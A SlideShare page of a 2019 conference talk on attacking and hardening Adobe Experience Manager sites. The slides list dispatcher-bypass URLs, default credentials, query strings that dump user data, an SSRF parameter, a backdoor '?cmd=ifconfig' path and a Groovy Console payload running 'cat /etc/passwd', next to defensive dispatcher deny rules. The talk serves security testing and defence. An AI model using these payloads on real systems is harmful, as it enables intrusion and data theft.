Mikhail Egorov, profile picture
Uploaded byMikhail Egorov
PDF, PPTX4,122 views

Securing AEM webapps by hacking them

The document details a presentation by security researcher Mikhail Egorov on vulnerabilities in Adobe Experience Manager (AEM) web applications, focusing on security misconfigurations, code flaws, and third-party plugin weaknesses. It highlights various types of attacks and specific vulnerabilities, including those leading to remote code execution and server-side request forgery. The presentation emphasizes the importance of security updates, proper configuration, and proactive testing measures for maintaining AEM security.

Embed presentation

Download as PDF, PPTX
APACHE SLING & FRIENDS TECH MEETUP 2 - 4 SEPTEMBER 2019 Securing AEM webapps by hacking them Mikhail Egorov @0ang3el, Security researcher & Bug hunter.
2 Intro
whoami 3  Security researcher & full-time bug hunter  https://bugcrowd.com/0ang3el  https://hackerone.com/0ang3el  Conference speaker  https://www.slideshare.net/0ang3el  https://speakerdeck.com/0ang3el
AEM & Bug Bounties 4
My research on AEM security 5 PHDays 2015 Hacktivity 2018 LevelUp 2019 https://www.slideshare.net/0ang3el
Fellow hackers 6 @darkarnium, 2016 @fransrosen, 2018 @JonathanBoumanium, 2018 https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
Common AEM deployment 7 Interacts with Publish server via AEM Dispatcher! 4503/tcp 4502/tcp 443/tcp ? Main blocks: • Author AEM instance • Publish AEM instance • AEM dispatcher (~WAF)
Sources of vulnerabilities 8  AEM misconfiguration  AEM code (CVEs)  3rd-party plugins  Your code
9 Vulnerabilities due to misconfiguration
AEM dispatcher bypass – CVE-2016-0957 10  Blocked by Dispatcher  /bin/querybuilder.json  However passed to publish instance  /bin/querybuilder.json/a.css  /bin/querybuilder.json/a.icoS  /bin/querybuilder.json?a.html  /bin/querybuilder.json;%0aa.css
AEM dispatcher bypass – Sling “features” 11  When Sling Servlet is registered with sling.servlet.path other properties are ignored (e.g. sling.servlet.extensions)  Bypassing extension check  /bin/querybuilder.json.css  /bin/querybuilder.feed.ico
AEM dispatcher bypass – Sling “features” 12  When Sling Servlet is registered with sling.servlet.resourceTypes  Bypassing path check  Create node with proper sling:resourceType under /content/usergenerated/etc/commerce/smartlists
AEM dispatcher security tips 13  Don’t use rules like  /0041 { /type "allow" /url "*.css" } # This is bad  Better use  /0041 { /type "allow" /extension 'css' }
AEM dispatcher security tips 14  Explicit deny rule for dangerous endpoints  /0090 { /type "deny" /path "/libs/*" }  /0091 { /type "deny" /path "/bin/querybuilder*" }  Place explicit deny rules in the end of policy
Default credentials 15  admin/admin  author/author  Geometrixx users  grios:password  jdoe@geometrixx.info:jdoe  …
Default credentials 16 == base64(admin:admin)
Weak passwords / Credentials bruterorcing 17  Properties jcr:createdBy, cq:lastModifiedBy, jcr:lastModifiedBy contain usernames  Many ways to bruteforce  LoginStatusServlet  GetLoggedInUser servlet  CurrentUserServlet  …
Weak permissions for JCR 18  Many ways to access JCR  DefaultGetServlet  QueryBuilderJsonServlet  QueryBuilderFeedServlet  GQLSearchServlet  CRXDE Lite  …
Weak permissions for JCR 19  Anonymous user has jcr:write permission for /content/usergenerated/etc/commerce/s martlists
0 /apps/<redacted>/config.author.tidy.1..json/a.ico
Weak permissions for JCR 21 type=nt:file&nodename=*.zip
Weak permissions for JCR 22 path=/home&p.hits=full&p.limit=-1
23 Vulnerabilities due to 3-rd party components
Groovy Console 24  Exposes servlet at /bin/groovyconsole/post.servlet without authentication by default https://github.com/icfnext/aem-groovy-console
cS4VLFuCHKwX;XS script=def+proc+%3d+”cat+/etc/passwd”.execute()%0d%0aprintln+proc.text
ACS AEM Tools 26  Exposes Fiddle with ability to execute JSP scripts on /etc/acs-tools/aem- fiddle/_jcr_content.run.html  May not require authentication
cS4VLFuCHKwX;X
28 AEM vulnerabilities
CVE-2018-12809 (SSRF*) 29  ReportingServicesProxyServlet (cq-content-insight bundle) @SlingServlet( generateComponent = true, metatype = true, resourceTypes = {"cq/contentinsight/proxy"}, extensions = {"json"}, selectors = {"reportingservices"}, methods = {"GET"}, label = "Reporting Services API proxy servlet", description = "Proxy servlet for Reporting Services API" ) public class ReportingServicesProxyServlet extends SlingSafeMethodsServlet { private static final String DEFAULT_API_OMNITURE_URL = ".*/api[0-9]*.omniture.com/.*";} … } *SSRF - Server Side Request Forgery
CVE-2018-12809 (SSRF*) 30  Paths to invoke servlet  /libs/cq/contentinsight/content/proxy.reportingservices.json  /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet  Vulnerable parameter url  url=http://anyurl%23/api1.omniture.com/a *SSRF - Server Side Request Forgery
ExternalJobPostServlet deser / CVE? 34  Affects AEM 5.5 / AEM 5.6 @Service @Properties(value = { @Property(name = "sling.servlet.extensions", value = "json"), @Property(name = "sling.servlet.paths", value = "/libs/dam/cloud/proxy"), @Property(name = "sling.servlet.methods", value = { "POST", "GET", "HEAD" }) }) public class ExternalJobPostServlet extends SlingAllMethodsServlet { ... }
ExternalJobPostServlet deser / CVE? 35  Parameter file accepts Java serialized stream and passes to OIS.readObject()  Hard to exploit in OSGI environment
38 Automation
AEM RCE bundle 39  Allows to get RCE* when having access to Felix Console  https://github.com/0ang3el/aem-rce-bundle.git * RCE – Remote Code Execution
AEM RCE bundle 40  Path - /bin/backdoor.html?cmd=ifconfig
AEM Hacker 41  Scripts to check security of AEM application  aem_hacker.py, aem_discoverer.py, aem_enum.py, aem_ssrf2rce.py, aem_server.py, response.bin, aem-rce-sling-script.sh  https://github.com/0ang3el/aem-hacker.git
DEMO 42
43 Takeaways
Takeaways 44  Vulnerabilities can occur on different levels  Install security updates  Defense in depth  Check security of AEM application  Pentest / Bug bounty
45 Thank you @0ang3el

More Related Content

PDF
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
byMikhail Egorov
 
PDF
Hunting for security bugs in AEM webapps
byMikhail Egorov
 
PDF
Hacking Adobe Experience Manager sites
byMikhail Egorov
 
PDF
A story of the passive aggressive sysadmin of AEM
byFrans Rosén
 
PDF
Bug Bounty Hunter Methodology - Nullcon 2016
bybugcrowd
 
PDF
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
byFrans Rosén
 
PPTX
Waf bypassing Techniques
byAvinash Thapa
 
PDF
XSS Magic tricks
byGarethHeyes
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
byMikhail Egorov
 
Hunting for security bugs in AEM webapps
byMikhail Egorov
 
Hacking Adobe Experience Manager sites
byMikhail Egorov
 
A story of the passive aggressive sysadmin of AEM
byFrans Rosén
 
Bug Bounty Hunter Methodology - Nullcon 2016
bybugcrowd
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
byFrans Rosén
 
Waf bypassing Techniques
byAvinash Thapa
 
XSS Magic tricks
byGarethHeyes
 

What's hot

PDF
A Hacker's perspective on AEM applications security
byMikhail Egorov
 
PDF
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
byhacktivity
 
PDF
What should a hacker know about WebDav?
byMikhail Egorov
 
PDF
remote-method-guesser - BHUSA2021 Arsenal
byTobias Neitzel
 
PDF
Building Advanced XSS Vectors
byRodolfo Assis (Brute)
 
PPTX
Detection Rules Coverage
bySunny Neo
 
PPTX
XXE: How to become a Jedi
byYaroslav Babin
 
PDF
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
PDF
PHDays 2018 Threat Hunting Hands-On Lab
byTeymur Kheirkhabarov
 
PDF
Polyglot payloads in practice by avlidienbrunn at HackPra
byMathias Karlsson
 
PDF
aclpwn - Active Directory ACL exploitation with BloodHound
byDirkjanMollema
 
PDF
Credential store using HashiCorp Vault
byMayank Patel
 
PDF
PHP unserialization vulnerabilities: What are we missing?
bySam Thomas
 
PDF
Java Deserialization Vulnerabilities - The Forgotten Bug Class
byCODE WHITE GmbH
 
PPTX
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
bySoroush Dalili
 
ODP
XSS
byHrishikesh Mishra
 
PPTX
An Introduction to OAuth 2
byAaron Parecki
 
PPTX
Cross Site Scripting: Prevention and Detection(XSS)
byAman Singh
 
PPTX
Attacking thru HTTP Host header
bySergey Belov
 
PDF
How fun of privilege escalation Red Pill2017
byAmmarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
A Hacker's perspective on AEM applications security
byMikhail Egorov
 
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
byhacktivity
 
What should a hacker know about WebDav?
byMikhail Egorov
 
remote-method-guesser - BHUSA2021 Arsenal
byTobias Neitzel
 
Building Advanced XSS Vectors
byRodolfo Assis (Brute)
 
Detection Rules Coverage
bySunny Neo
 
XXE: How to become a Jedi
byYaroslav Babin
 
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
PHDays 2018 Threat Hunting Hands-On Lab
byTeymur Kheirkhabarov
 
Polyglot payloads in practice by avlidienbrunn at HackPra
byMathias Karlsson
 
aclpwn - Active Directory ACL exploitation with BloodHound
byDirkjanMollema
 
Credential store using HashiCorp Vault
byMayank Patel
 
PHP unserialization vulnerabilities: What are we missing?
bySam Thomas
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
byCODE WHITE GmbH
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
bySoroush Dalili
 
XSS
byHrishikesh Mishra
 
An Introduction to OAuth 2
byAaron Parecki
 
Cross Site Scripting: Prevention and Detection(XSS)
byAman Singh
 
Attacking thru HTTP Host header
bySergey Belov
 
How fun of privilege escalation Red Pill2017
byAmmarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 

Similar to Securing AEM webapps by hacking them

PDF
4 andrii kudiurov - web application security 101
byIevgenii Katsan
 
PPT
Web Hacking
byInformation Technology
 
ODP
Hunting Security Bugs in Modern Web Applications
byToe Khaing
 
PPTX
Burp Suite is a powerful and widely-used tool
bywaudit1
 
PPTX
A Closer Look on C&C Panels
byTandhy Simanjuntak
 
PDF
End to end web security
byGeorge Boobyer
 
PDF
Top Ten Web Hacking Techniques (2010)
byJeremiah Grossman
 
DOCX
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
byAjith Kp
 
PDF
I got 99 trends and a # is all of them
byRoberto Suggi Liverani
 
PPTX
Owasp web application security trends
bybeched
 
PPTX
[2.1] Web application Security Trends - Omar Ganiev
byOWASP Russia
 
PDF
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
byFedir RYKHTIK
 
PPT
Web Apps Security
byVictor Bucutea
 
PPT
Web Attacks - Top threats - 2010
byShreeraj Shah
 
PDF
Web Application Scanning 101
bySasha Nunke
 
PPTX
SCWCD : Secure web : CHAP : 7
byBen Abdallah Helmi
 
PPTX
SCWCD : Secure web
byBen Abdallah Helmi
 
PDF
Cloud Insecurity
byMarco Arena
 
PDF
Approach to find critical vulnerabilities
byAshish Kunwar
 
PDF
Do you lose sleep at night?
byNathan Van Gheem
 
4 andrii kudiurov - web application security 101
byIevgenii Katsan
 
Web Hacking
byInformation Technology
 
Hunting Security Bugs in Modern Web Applications
byToe Khaing
 
Burp Suite is a powerful and widely-used tool
bywaudit1
 
A Closer Look on C&C Panels
byTandhy Simanjuntak
 
End to end web security
byGeorge Boobyer
 
Top Ten Web Hacking Techniques (2010)
byJeremiah Grossman
 
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
byAjith Kp
 
I got 99 trends and a # is all of them
byRoberto Suggi Liverani
 
Owasp web application security trends
bybeched
 
[2.1] Web application Security Trends - Omar Ganiev
byOWASP Russia
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
byFedir RYKHTIK
 
Web Apps Security
byVictor Bucutea
 
Web Attacks - Top threats - 2010
byShreeraj Shah
 
Web Application Scanning 101
bySasha Nunke
 
SCWCD : Secure web : CHAP : 7
byBen Abdallah Helmi
 
SCWCD : Secure web
byBen Abdallah Helmi
 
Cloud Insecurity
byMarco Arena
 
Approach to find critical vulnerabilities
byAshish Kunwar
 
Do you lose sleep at night?
byNathan Van Gheem
 

More from Mikhail Egorov

PDF
ORM2Pwn: Exploiting injections in Hibernate ORM
byMikhail Egorov
 
PDF
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
byMikhail Egorov
 
PDF
New methods for exploiting ORM injections in Java applications
byMikhail Egorov
 
PPTX
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
byMikhail Egorov
 
PDF
Unsafe JAX-RS: Breaking REST API
byMikhail Egorov
 
PDF
Entity provider selection confusion attacks in JAX-RS applications
byMikhail Egorov
 
ORM2Pwn: Exploiting injections in Hibernate ORM
byMikhail Egorov
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
byMikhail Egorov
 
New methods for exploiting ORM injections in Java applications
byMikhail Egorov
 
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
byMikhail Egorov
 
Unsafe JAX-RS: Breaking REST API
byMikhail Egorov
 
Entity provider selection confusion attacks in JAX-RS applications
byMikhail Egorov
 

Recently uploaded

PDF
Exploration of Fault Identification and Automatic Recovery in Cloud-based FPG...
bySatoshi Konno
 
PPTX
Elastic meetup - From Search to Smart: Python + Elastic ELSER.pptx
bysmollinga
 
PDF
Reducing the cost of ownership in e-commerce. Jakub Winkler, Meet Magento Net...
byJakub Winkler
 
PPTX
SaferNet: Simplifying Security with Smart Device Management
bySafernet
 
PPTX
Cybersecurity: Definition, Importance, and Best Practices.pptx
byCloudavize
 
PDF
Categorisation_of_Cyber_Attacks for hnd pearson level 4 students
byhawa175590
 
PDF
Mobile App Accessibility Standards Every Developer Should Know.pdf
bydavidjohansen1597
 
PDF
Using Geolocation Features To Personalize Mobile Apps.pdf
bydavidjohansen1597
 
PDF
10 Interesting Facts About Infinite Craft
byMiranda Croftoon
 
PPTX
Hire AI Developers | Agicent Technologies
byriveranicky099
 
PDF
Is AI Replacing Web Developers or Making Them Smarter.pdf
byNetzila Technologies
 
PDF
Missouri Mobile App Development Company Addresses Safety Concerns After UPS P...
byMike Brown
 
PPTX
Презентация Филимонов (английский).pptx
bydragonnonext
 
PDF
Digital PR Essentials: A Complete Beginner’s Guide to Earning Media Coverage ...
byVolodymyr Zhyliaev
 
PPTX
Mod 2-ICT as the medium for advocacy.pptx
byMelyangIntong
 
DOCX
How To Safely Buy an Instagram Account (Guide 2025).docx
bycucfuc315
 
PDF
What is Crypto SIP & How It Works | Beginner’s Guide to Crypto SIP Investments
by3verseTV
 
PDF
The walking dead series-Apresentation free dowload.pdf
byDinisPires6
 
PPTX
DISS presentation. pptx mmmmmmmmmmmmmmmmmm
byannamarietotong020
 
Exploration of Fault Identification and Automatic Recovery in Cloud-based FPG...
bySatoshi Konno
 
Elastic meetup - From Search to Smart: Python + Elastic ELSER.pptx
bysmollinga
 
Reducing the cost of ownership in e-commerce. Jakub Winkler, Meet Magento Net...
byJakub Winkler
 
SaferNet: Simplifying Security with Smart Device Management
bySafernet
 
Cybersecurity: Definition, Importance, and Best Practices.pptx
byCloudavize
 
Categorisation_of_Cyber_Attacks for hnd pearson level 4 students
byhawa175590
 
Mobile App Accessibility Standards Every Developer Should Know.pdf
bydavidjohansen1597
 
Using Geolocation Features To Personalize Mobile Apps.pdf
bydavidjohansen1597
 
10 Interesting Facts About Infinite Craft
byMiranda Croftoon
 
Hire AI Developers | Agicent Technologies
byriveranicky099
 
Is AI Replacing Web Developers or Making Them Smarter.pdf
byNetzila Technologies
 
Missouri Mobile App Development Company Addresses Safety Concerns After UPS P...
byMike Brown
 
Презентация Филимонов (английский).pptx
bydragonnonext
 
Digital PR Essentials: A Complete Beginner’s Guide to Earning Media Coverage ...
byVolodymyr Zhyliaev
 
Mod 2-ICT as the medium for advocacy.pptx
byMelyangIntong
 
How To Safely Buy an Instagram Account (Guide 2025).docx
bycucfuc315
 
What is Crypto SIP & How It Works | Beginner’s Guide to Crypto SIP Investments
by3verseTV
 
The walking dead series-Apresentation free dowload.pdf
byDinisPires6
 
DISS presentation. pptx mmmmmmmmmmmmmmmmmm
byannamarietotong020
 
In this document
Powered by AI

Overview of Apache Sling Tech Meetup and the speaker's background as a security researcher.

Discussion on AEM security, bug bounties, and common sources of vulnerabilities.

Identifying vulnerabilities due to AEM misconfiguration and methods for dispatcher bypass.

Best practices for AEM dispatcher rules to enhance security against potential vulnerabilities.

Risks posed by default credentials and weak permissions for JCR, leading to unauthorized access.

Vulnerabilities arising from third-party components like Groovy Console and ACS AEM Tools.

Detailed analysis of CVEs related to AEM including SSRF risks and other servlet issues.

Detailed analysis of CVEs related to AEM including SSRF risks and other servlet issues.

Introduction to automation tools that assist in identifying vulnerabilities and conducting security assessments.

Summary of key takeaways for ensuring AEM security and the importance of updates and pentesting.

Thank you note from the speaker, closing the presentation.

Securing AEM webapps by hacking them

  • 1.
    APACHE SLING &FRIENDS TECH MEETUP 2 - 4 SEPTEMBER 2019 Securing AEM webapps by hacking them Mikhail Egorov @0ang3el, Security researcher & Bug hunter.
  • 2.
  • 3.
    whoami 3  Security researcher& full-time bug hunter  https://bugcrowd.com/0ang3el  https://hackerone.com/0ang3el  Conference speaker  https://www.slideshare.net/0ang3el  https://speakerdeck.com/0ang3el
  • 4.
    AEM & BugBounties 4
  • 5.
    My research onAEM security 5 PHDays 2015 Hacktivity 2018 LevelUp 2019 https://www.slideshare.net/0ang3el
  • 6.
    Fellow hackers 6 @darkarnium, 2016 @fransrosen,2018 @JonathanBoumanium, 2018 https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
  • 7.
    Common AEM deployment 7 Interactswith Publish server via AEM Dispatcher! 4503/tcp 4502/tcp 443/tcp ? Main blocks: • Author AEM instance • Publish AEM instance • AEM dispatcher (~WAF)
  • 8.
    Sources of vulnerabilities 8 AEM misconfiguration  AEM code (CVEs)  3rd-party plugins  Your code
  • 9.
    9 Vulnerabilities due tomisconfiguration
  • 10.
    AEM dispatcher bypass– CVE-2016-0957 10  Blocked by Dispatcher  /bin/querybuilder.json  However passed to publish instance  /bin/querybuilder.json/a.css  /bin/querybuilder.json/a.icoS  /bin/querybuilder.json?a.html  /bin/querybuilder.json;%0aa.css
  • 11.
    AEM dispatcher bypass– Sling “features” 11  When Sling Servlet is registered with sling.servlet.path other properties are ignored (e.g. sling.servlet.extensions)  Bypassing extension check  /bin/querybuilder.json.css  /bin/querybuilder.feed.ico
  • 12.
    AEM dispatcher bypass– Sling “features” 12  When Sling Servlet is registered with sling.servlet.resourceTypes  Bypassing path check  Create node with proper sling:resourceType under /content/usergenerated/etc/commerce/smartlists
  • 13.
    AEM dispatcher securitytips 13  Don’t use rules like  /0041 { /type "allow" /url "*.css" } # This is bad  Better use  /0041 { /type "allow" /extension 'css' }
  • 14.
    AEM dispatcher securitytips 14  Explicit deny rule for dangerous endpoints  /0090 { /type "deny" /path "/libs/*" }  /0091 { /type "deny" /path "/bin/querybuilder*" }  Place explicit deny rules in the end of policy
  • 15.
    Default credentials 15  admin/admin author/author  Geometrixx users  grios:password  jdoe@geometrixx.info:jdoe  …
  • 16.
  • 17.
    Weak passwords /Credentials bruterorcing 17  Properties jcr:createdBy, cq:lastModifiedBy, jcr:lastModifiedBy contain usernames  Many ways to bruteforce  LoginStatusServlet  GetLoggedInUser servlet  CurrentUserServlet  …
  • 18.
    Weak permissions forJCR 18  Many ways to access JCR  DefaultGetServlet  QueryBuilderJsonServlet  QueryBuilderFeedServlet  GQLSearchServlet  CRXDE Lite  …
  • 19.
    Weak permissions forJCR 19  Anonymous user has jcr:write permission for /content/usergenerated/etc/commerce/s martlists
  • 20.
  • 21.
    Weak permissions forJCR 21 type=nt:file&nodename=*.zip
  • 22.
    Weak permissions forJCR 22 path=/home&p.hits=full&p.limit=-1
  • 23.
    23 Vulnerabilities due to3-rd party components
  • 24.
    Groovy Console 24  Exposesservlet at /bin/groovyconsole/post.servlet without authentication by default https://github.com/icfnext/aem-groovy-console
  • 25.
  • 26.
    ACS AEM Tools 26 Exposes Fiddle with ability to execute JSP scripts on /etc/acs-tools/aem- fiddle/_jcr_content.run.html  May not require authentication
  • 27.
  • 28.
  • 29.
    CVE-2018-12809 (SSRF*) 29  ReportingServicesProxyServlet(cq-content-insight bundle) @SlingServlet( generateComponent = true, metatype = true, resourceTypes = {"cq/contentinsight/proxy"}, extensions = {"json"}, selectors = {"reportingservices"}, methods = {"GET"}, label = "Reporting Services API proxy servlet", description = "Proxy servlet for Reporting Services API" ) public class ReportingServicesProxyServlet extends SlingSafeMethodsServlet { private static final String DEFAULT_API_OMNITURE_URL = ".*/api[0-9]*.omniture.com/.*";} … } *SSRF - Server Side Request Forgery
  • 30.
    CVE-2018-12809 (SSRF*) 30  Pathsto invoke servlet  /libs/cq/contentinsight/content/proxy.reportingservices.json  /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet  Vulnerable parameter url  url=http://anyurl%23/api1.omniture.com/a *SSRF - Server Side Request Forgery
  • 34.
    ExternalJobPostServlet deser /CVE? 34  Affects AEM 5.5 / AEM 5.6 @Service @Properties(value = { @Property(name = "sling.servlet.extensions", value = "json"), @Property(name = "sling.servlet.paths", value = "/libs/dam/cloud/proxy"), @Property(name = "sling.servlet.methods", value = { "POST", "GET", "HEAD" }) }) public class ExternalJobPostServlet extends SlingAllMethodsServlet { ... }
  • 35.
    ExternalJobPostServlet deser /CVE? 35  Parameter file accepts Java serialized stream and passes to OIS.readObject()  Hard to exploit in OSGI environment
  • 38.
  • 39.
    AEM RCE bundle 39 Allows to get RCE* when having access to Felix Console  https://github.com/0ang3el/aem-rce-bundle.git * RCE – Remote Code Execution
  • 40.
    AEM RCE bundle 40 Path - /bin/backdoor.html?cmd=ifconfig
  • 41.
    AEM Hacker 41  Scriptsto check security of AEM application  aem_hacker.py, aem_discoverer.py, aem_enum.py, aem_ssrf2rce.py, aem_server.py, response.bin, aem-rce-sling-script.sh  https://github.com/0ang3el/aem-hacker.git
  • 42.
  • 43.
  • 44.
    Takeaways 44  Vulnerabilities canoccur on different levels  Install security updates  Defense in depth  Check security of AEM application  Pentest / Bug bounty
  • 45.